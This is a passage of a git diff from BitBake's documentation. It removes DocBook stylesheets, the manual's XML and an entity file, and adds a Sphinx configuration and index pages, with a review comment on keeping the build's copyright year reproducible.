- this point it is validating.
- Mozilla extensions
- Transparency for footer
- Rounded corners on boxes
-
-*/
-
-
- /*************** /
- / Positioning /
-/ ***************/
-
-body {
- font-family: Verdana, Sans, sans-serif;
-
- min-width: 640px;
- width: 80%;
- margin: 0em auto;
- padding: 2em 5em 5em 5em;
- color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
- font-family: Arial, Sans;
- color: #00557D;
- clear: both;
-}
-
-h1 {
- font-size: 2em;
- text-align: left;
- padding: 0em 0em 0em 0em;
- margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
- margin: 0.10em 0em 3.0em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 1.8em;
- padding-left: 20%;
- font-weight: normal;
- font-style: italic;
-}
-
-h2 {
- margin: 2em 0em 0.66em 0em;
- padding: 0.5em 0em 0em 0em;
- font-size: 1.5em;
- font-weight: bold;
-}
-
-h3.subtitle {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
- font-size: 142.14%;
- text-align: right;
-}
-
-h3 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 140%;
- font-weight: bold;
-}
-
-h4 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 120%;
- font-weight: bold;
-}
-
-h5 {
- margin: 1em 0em 0.5em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-h6 {
- margin: 1em 0em 0em 0em;
- padding: 1em 0em 0em 0em;
- font-size: 110%;
- font-weight: bold;
-}
-
-.authorgroup {
- background-color: transparent;
- background-repeat: no-repeat;
- padding-top: 256px;
- background-image: url("figures/bitbake-title.png");
- background-position: left top;
- margin-top: -256px;
- padding-right: 50px;
- margin-left: 0px;
- text-align: right;
- width: 740px;
-}
-
-h3.author {
- margin: 0em 0me 0em 0em;
- padding: 0em 0em 0em 0em;
- font-weight: normal;
- font-size: 100%;
- color: #333;
- clear: both;
-}
-
-.author tt.email {
- font-size: 66%;
-}
-
-.titlepage hr {
- width: 0em;
- clear: both;
-}
-
-.revhistory {
- padding-top: 2em;
- clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
- padding: 1.33em 0em 2.5em 0em;
- color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
- padding: 0em 0em 0em 0em;
- padding: 0em 0em 0.3em;
- margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
- font-size: 100.0%;
- font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
- margin: 0em 0em 0.5em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
- margin: 0em 0em 0em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
- margin: 0em 0em 0em 2.6em;
- padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- font-weight: normal;
- width: 20em;
- text-align: right;
-}
-
-.variablelist dl dt {
- margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
- margin-top: -1em;
- margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
- padding: 0em 0em 0em 0em;
- margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
- margin-top: 0em;
- margin-bottom: 1em;
-}
-
-div p.copyright {
- text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
- margin-bottom: 0em;
-}
-
-p {
- line-height: 1.5em;
- margin-top: 0em;
-
-}
-
-dl {
- padding-top: 0em;
-}
-
-hr {
- border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
- text-align: center;
-}
-
-img {
- border: none;
-}
-
-ul {
- padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual.xml
deleted file mode 100644
index d793265c9a..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual.xml
+++ /dev/null
@@ -1,88 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<book id='bitbake-user-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/bitbake-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- BitBake User Manual
- </title>
-
- <authorgroup>
- <author>
- <firstname>Richard Purdie, Chris Larson, and </firstname> <surname>Phil Blundell</surname>
- <affiliation>
- <orgname>BitBake Community</orgname>
- </affiliation>
- <email>bitbake-devel@lists.openembedded.org</email>
- </author>
- </authorgroup>
-
-<!--
-# Add in some revision history if we want it here.
- <revhistory>
- <revision>
- <revnumber>x.x</revnumber>
- <date>dd month year</date>
- <revremark>Some relevent comment</revremark>
- </revision>
- <revision>
- <revnumber>x.x</revnumber>
- <date>dd month year</date>
- <revremark>Some relevent comment</revremark>
- </revision>
- <revision>
- <revnumber>x.x</revnumber>
- <date>dd month year</date>
- <revremark>Some relevent comment</revremark>
- </revision>
- <revision>
- <revnumber>x.x</revnumber>
- <date>dd month year</date>
- <revremark>Some relevent comment</revremark>
- </revision>
- </revhistory>
--->
-
- <copyright>
- <year>2004-2018</year>
- <holder>Richard Purdie</holder>
- <holder>Chris Larson</holder>
- <holder>and Phil Blundell</holder>
- </copyright>
-
- <legalnotice>
- <para>
- This work is licensed under the Creative Commons Attribution License.
- To view a copy of this license, visit
- <ulink url="http://creativecommons.org/licenses/by/2.5/">http://creativecommons.org/licenses/by/2.5/</ulink>
- or send a letter to Creative Commons, 444 Castro Street,
- Suite 900, Mountain View, California 94041, USA.
- </para>
- </legalnotice>
- </bookinfo>
-
- <xi:include href="bitbake-user-manual-intro.xml"/>
-
- <xi:include href="bitbake-user-manual-execution.xml"/>
-
- <xi:include href="bitbake-user-manual-metadata.xml"/>
-
- <xi:include href="bitbake-user-manual-fetching.xml"/>
-
- <xi:include href="bitbake-user-manual-ref-variables.xml"/>
-
- <xi:include href="bitbake-user-manual-hello.xml"/>
-
-</book>
diff --git a/bitbake/doc/bitbake-user-manual/html.css b/bitbake/doc/bitbake-user-manual/html.css
deleted file mode 100644
index 6eedfd3189..0000000000
--- a/bitbake/doc/bitbake-user-manual/html.css
+++ /dev/null
@@ -1,281 +0,0 @@
-/* Feuille de style DocBook du projet Traduc.org */
-/* DocBook CSS stylesheet of the Traduc.org project */
-
-/* (c) Jean-Philippe Guérard - 14 août 2004 */
-/* (c) Jean-Philippe Guérard - 14 August 2004 */
-
-/* Cette feuille de style est libre, vous pouvez la */
-/* redistribuer et la modifier selon les termes de la Licence */
-/* Art Libre. Vous trouverez un exemplaire de cette Licence sur */
-/* http://tigreraye.org/Petit-guide-du-traducteur.html#licence-art-libre */
-
-/* This work of art is free, you can redistribute it and/or */
-/* modify it according to terms of the Free Art license. You */
-/* will find a specimen of this license on the Copyleft */
-/* Attitude web site: http://artlibre.org as well as on other */
-/* sites. */
-/* Please note that the French version of this licence as shown */
-/* on http://tigreraye.org/Petit-guide-du-traducteur.html#licence-art-libre */
-/* is only official licence of this document. The English */
-/* is only provided to help you understand this licence. */
-
-/* La dernière version de cette feuille de style est toujours */
-/* disponible sur : http://tigreraye.org/style.css */
-/* Elle est également disponible sur : */
-/* http://www.traduc.org/docs/HOWTO/lecture/style.css */
-
-/* The latest version of this stylesheet is available from: */
-/* http://tigreraye.org/style.css */
-/* It is also available on: */
-/* http://www.traduc.org/docs/HOWTO/lecture/style.css */
-
-/* N'hésitez pas à envoyer vos commentaires et corrections à */
-/* Jean-Philippe Guérard <jean-philippe.guerard@tigreraye.org> */
-
-/* Please send feedback and bug reports to */
-/* Jean-Philippe Guérard <jean-philippe.guerard@tigreraye.org> */
-
-/* $Id: style.css,v 1.14 2004/09/10 20:12:09 fevrier Exp fevrier $ */
-
-/* Présentation générale du document */
-/* Overall document presentation */
-
-body {
- /*
- font-family: Apolline, "URW Palladio L", Garamond, jGaramond,
- "Bitstream Cyberbit", "Palatino Linotype", serif;
- */
- margin: 7%;
- background-color: white;
-}
-
-/* Taille du texte */
-/* Text size */
-
-* { font-size: 100%; }
-
-/* Gestion des textes mis en relief imbriqués */
-/* Embedded emphasis */
-
-em { font-style: italic; }
-em em { font-style: normal; }
-em em em { font-style: italic; }
-
-/* Titres */
-/* Titles */
-
-h1 { font-size: 200%; font-weight: 900; }
-h2 { font-size: 160%; font-weight: 900; }
-h3 { font-size: 130%; font-weight: bold; }
-h4 { font-size: 115%; font-weight: bold; }
-h5 { font-size: 108%; font-weight: bold; }
-h6 { font-weight: bold; }
-
-/* Nom de famille en petites majuscules (uniquement en français) */
-/* Last names in small caps (for French only) */
-
-*[class~="surname"]:lang(fr) { font-variant: small-caps; }
-
-/* Blocs de citation */
-/* Quotation blocs */
-
-div[class~="blockquote"] {
- border: solid 2px #AAA;
- padding: 5px;
- margin: 5px;
-}
-
-div[class~="blockquote"] > table {
- border: none;
-}
-
-/* Blocs litéraux : fond gris clair */
-/* Literal blocs: light gray background */
-
-*[class~="literallayout"] {
- background: #f0f0f0;
- padding: 5px;
- margin: 5px;
-}
-
-/* Programmes et captures texte : fond bleu clair */
-/* Listing and text screen snapshots: light blue background */
-
-*[class~="programlisting"], *[class~="screen"] {
- background: #f0f0ff;
- padding: 5px;
- margin: 5px;
-}
-
-/* Les textes à remplacer sont surlignés en vert pâle */
-/* Replaceable text in highlighted in pale green */
-
-*[class~="replaceable"] {
- background-color: #98fb98;
- font-style: normal; }
-
-/* Tables : fonds gris clair & bords simples */
-/* Tables: light gray background and solid borders */
-
-*[class~="table"] *[class~="title"] { width:100%; border: 0px; }
-
-table {
- border: 1px solid #aaa;
- border-collapse: collapse;
- padding: 2px;
- margin: 5px;
-}
-
-/* Listes simples en style table */
-/* Simples lists in table presentation */
-
-table[class~="simplelist"] {
- background-color: #F0F0F0;
- margin: 5px;
- border: solid 1px #AAA;
-}
-
-table[class~="simplelist"] td {
- border: solid 1px #AAA;
-}
-
-/* Les tables */
-/* Tables */
-
-*[class~="table"] table {
- background-color: #F0F0F0;
- border: solid 1px #AAA;
-}
-*[class~="informaltable"] table { background-color: #F0F0F0; }
-
-th,td {
- vertical-align: baseline;
- text-align: left;
- padding: 0.1em 0.3em;
- empty-cells: show;
-}
-
-/* Alignement des colonnes */
-/* Colunms alignment */
-
-td[align=center] , th[align=center] { text-align: center; }
-td[align=right] , th[align=right] { text-align: right; }
-td[align=left] , th[align=left] { text-align: left; }
-td[align=justify] , th[align=justify] { text-align: justify; }
-
-/* Pas de marge autour des images */
-/* No inside margins for images */
-
-img { border: 0; }
-
-/* Les liens ne sont pas soulignés */
-/* No underlines for links */
-
-:link , :visited , :active { text-decoration: none; }
-
-/* Prudence : cadre jaune et fond jaune clair */
-/* Caution: yellow border and light yellow background */
-
-*[class~="caution"] {
- border: solid 2px yellow;
- background-color: #ffffe0;
- padding: 1em 6px 1em ;
- margin: 5px;
-}
-
-*[class~="caution"] th {
- vertical-align: middle
-}
-
-*[class~="caution"] table {
- background-color: #ffffe0;
- border: none;
-}
-
-/* Note importante : cadre jaune et fond jaune clair */
-/* Important: yellow border and light yellow background */
-
-*[class~="important"] {
- border: solid 2px yellow;
- background-color: #ffffe0;
- padding: 1em 6px 1em;
- margin: 5px;
-}
-
-*[class~="important"] th {
- vertical-align: middle
-}
-
-*[class~="important"] table {
- background-color: #ffffe0;
- border: none;
-}
-
-/* Mise en évidence : texte légèrement plus grand */
-/* Highlights: slightly larger texts */
-
-*[class~="highlights"] {
- font-size: 110%;
-}
-
-/* Note : cadre bleu et fond bleu clair */
-/* Notes: blue border and light blue background */
-
-*[class~="note"] {
- border: solid 2px #7099C5;
- background-color: #f0f0ff;
- padding: 1em 6px 1em ;
- margin: 5px;
-}
-
-*[class~="note"] th {
- vertical-align: middle
-}
-
-*[class~="note"] table {
- background-color: #f0f0ff;
- border: none;
-}
-
-/* Astuce : cadre vert et fond vert clair */
-/* Tip: green border and light green background */
-
-*[class~="tip"] {
- border: solid 2px #00ff00;
- background-color: #f0ffff;
- padding: 1em 6px 1em ;
- margin: 5px;
-}
-
-*[class~="tip"] th {
- vertical-align: middle;
-}
-
-*[class~="tip"] table {
- background-color: #f0ffff;
- border: none;
-}
-
-/* Avertissement : cadre rouge et fond rouge clair */
-/* Warning: red border and light red background */
-
-*[class~="warning"] {
- border: solid 2px #ff0000;
- background-color: #fff0f0;
- padding: 1em 6px 1em ;
- margin: 5px;
-}
-
-*[class~="warning"] th {
- vertical-align: middle;
-}
-
-
-*[class~="warning"] table {
- background-color: #fff0f0;
- border: none;
-}
-
-/* Fin */
-/* The End */
-
diff --git a/bitbake/doc/conf.py b/bitbake/doc/conf.py
new file mode 100644
index 0000000000..fc2ee08111
--- /dev/null
+++ b/bitbake/doc/conf.py
@@ -0,0 +1,101 @@
+# Configuration file for the Sphinx documentation builder.
+#
+# This file only contains a selection of the most common options. For a full
+# list see the documentation:
+# https://www.sphinx-doc.org/en/master/usage/configuration.html
+
+# -- Path setup --------------------------------------------------------------
+
+# If extensions (or modules to document with autodoc) are in another directory,
+# add these directories to sys.path here. If the directory is relative to the
+# documentation root, use os.path.abspath to make it absolute, like shown here.
+#
+# import os
+# import sys
+# sys.path.insert(0, os.path.abspath('.'))
+
+import sys
+import datetime
+
+current_version = "dev"
+
+# String used in sidebar
+version = 'Version: ' + current_version
+if current_version == 'dev':
+ version = 'Version: Current Development'
+# Version seen in documentation_options.js and hence in js switchers code
+release = current_version
+
+# -- Project information -----------------------------------------------------
+
+project = 'Bitbake'
+copyright = '2004-%s, Richard Purdie, Chris Larson, and Phil Blundell' \
+ % datetime.datetime.now().year
+author = 'Richard Purdie, Chris Larson, and Phil Blundell'
+
+# external links and substitutions
+extlinks = {
+ 'yocto_docs': ('https://docs.yoctoproject.org%s', None),
+ 'oe_lists': ('https://lists.openembedded.org%s', None),
+}
+
+# -- General configuration ---------------------------------------------------
+
+# Add any Sphinx extension module names here, as strings. They can be
+# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
+# ones.
+extensions = [
+ 'sphinx.ext.autosectionlabel',
+ 'sphinx.ext.extlinks',
+]
+autosectionlabel_prefix_document = True
+
+# Add any paths that contain templates here, relative to this directory.
+templates_path = ['_templates']
+
+# List of patterns, relative to source directory, that match files and
+# directories to ignore when looking for source files.
+# This pattern also affects html_static_path and html_extra_path.
+exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
+
+# master document name. The default changed from contents to index. so better
+# set it ourselves.
+master_doc = 'index'
+
+# create substitution for project configuration variables
+rst_prolog = """
+.. |project_name| replace:: %s
+.. |copyright| replace:: %s
+.. |author| replace:: %s
+""" % (project, copyright, author)
+
+# -- Options for HTML output -------------------------------------------------
+
+# The theme to use for HTML and HTML Help pages. See the documentation for
+# a list of builtin themes.
+#
+try:
+ import sphinx_rtd_theme
+ html_theme = 'sphinx_rtd_theme'
+except ImportError:
+ sys.stderr.write("The Sphinx sphinx_rtd_theme HTML theme was not found.\
+ \nPlease make sure to install the sphinx_rtd_theme python package.\n")
+ sys.exit(1)
+
+# Add any paths that contain custom static files (such as style sheets) here,
+# relative to this directory. They are copied after the builtin static files,
+# so a file named "default.css" will overwrite the builtin "default.css".
+html_static_path = ['sphinx-static']
+
+# Add customm CSS and JS files
+html_css_files = ['theme_overrides.css']
+html_js_files = ['switchers.js']
+
+# Hide 'Created using Sphinx' text
+html_show_sphinx = False
+
+# Add 'Last updated' on each page
+html_last_updated_fmt = '%b %d, %Y'
+
+# Remove the trailing 'dot' in section numbers
+html_secnumber_suffix = " "
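Review bot: The `copyright` assignment takes its end year from `datetime.datetime.now().year`, so the rendered manual depends on the build machine's clock and the same source tree can produce different HTML on different days. That makes it harder to check a rebuilt manual byte-for-byte against a published one. Deriving the year from `SOURCE_DATE_EPOCH` when it is set keeps the output stable: `build_year = time.gmtime(int(os.environ.get('SOURCE_DATE_EPOCH', time.time()))).tm_year`, with `import os` and `import time` added beside the existing imports and `% build_year` used in the `copyright` line. `html_last_updated_fmt = '%b %d, %Y'` near the end of the file also stamps a date on every page; Sphinx is expected to take that date from `SOURCE_DATE_EPOCH` too, but this is worth confirming for the Sphinx version in use.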
diff --git a/bitbake/doc/genindex.rst b/bitbake/doc/genindex.rst
new file mode 100644
index 0000000000..a4af06f656
--- /dev/null
+++ b/bitbake/doc/genindex.rst
@@ -0,0 +1,3 @@
+=====
+Index
+=====
diff --git a/bitbake/doc/index.rst b/bitbake/doc/index.rst
new file mode 100644
index 0000000000..3ff8b1580f
--- /dev/null
+++ b/bitbake/doc/index.rst
@@ -0,0 +1,38 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+===================
+BitBake User Manual
+===================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ bitbake-user-manual/bitbake-user-manual-intro
+ bitbake-user-manual/bitbake-user-manual-execution
+ bitbake-user-manual/bitbake-user-manual-metadata
+ bitbake-user-manual/bitbake-user-manual-fetching
+ bitbake-user-manual/bitbake-user-manual-ref-variables
+ bitbake-user-manual/bitbake-user-manual-hello
+
+.. toctree::
+ :maxdepth: 1
+ :hidden:
+
+ genindex
+ releases
+
+----
+
+.. include:: <xhtml1-lat1.txt>
+
+| BitBake Community
+| Copyright |copy| |copyright|
+| <bitbake-devel@lists.openembedded.org>
+
+This work is licensed under the Creative Commons Attribution License. To view a
+copy of this license, visit http://creativecommons.org/licenses/by/2.5/ or send
+a letter to Creative Commons, 444 Castro Street, Suite 900, Mountain View,
+California 94041, USA.
diff --git a/bitbake/doc/poky.ent b/bitbake/doc/poky.ent
deleted file mode 100644
index 85d9c83bf2..0000000000
--- a/bitbake/doc/poky.ent
+++ /dev/null
@@ -1,51 +0,0 @@
-<!ENTITY DISTRO "1.4">
-<!ENTITY DISTRO_NAME "tbd">
-<!ENTITY YOCTO_DOC_VERSION "1.4">
-<!ENTITY POKYVERSION "8.0">
-<!ENTITY YOCTO_POKY "poky-&DISTRO_NAME;-&POKYVERSION;">
-<!ENTITY COPYRIGHT_YEAR "2010-2013">
-<!ENTITY YOCTO_DL_URL "http://downloads.yoctoproject.org">
-<!ENTITY YOCTO_HOME_URL "http://www.yoctoproject.org">
-<!ENTITY YOCTO_LISTS_URL "http://lists.yoctoproject.org">
-<!ENTITY YOCTO_BUGZILLA_URL "http://bugzilla.yoctoproject.org">
-<!ENTITY YOCTO_WIKI_URL "https://wiki.yoctoproject.org">
-<!ENTITY YOCTO_AB_URL "http://autobuilder.yoctoproject.org">
-<!ENTITY YOCTO_GIT_URL "http://git.yoctoproject.org">
-<!ENTITY YOCTO_ADTREPO_URL "http://adtrepo.yoctoproject.org">
-<!ENTITY OE_HOME_URL "http://www.openembedded.org">
-<!ENTITY OE_LISTS_URL "http://lists.linuxtogo.org/cgi-bin/mailman">
-<!ENTITY OE_DOCS_URL "http://docs.openembedded.org">
-<!ENTITY OH_HOME_URL "http://o-hand.com">
-<!ENTITY BITBAKE_HOME_URL "http://developer.berlios.de/projects/bitbake/">
-<!ENTITY YOCTO_DOCS_URL "&YOCTO_HOME_URL;/docs">
-<!ENTITY YOCTO_SOURCES_URL "&YOCTO_HOME_URL;/sources/">
-<!ENTITY YOCTO_AB_PORT_URL "&YOCTO_AB_URL;:8010">
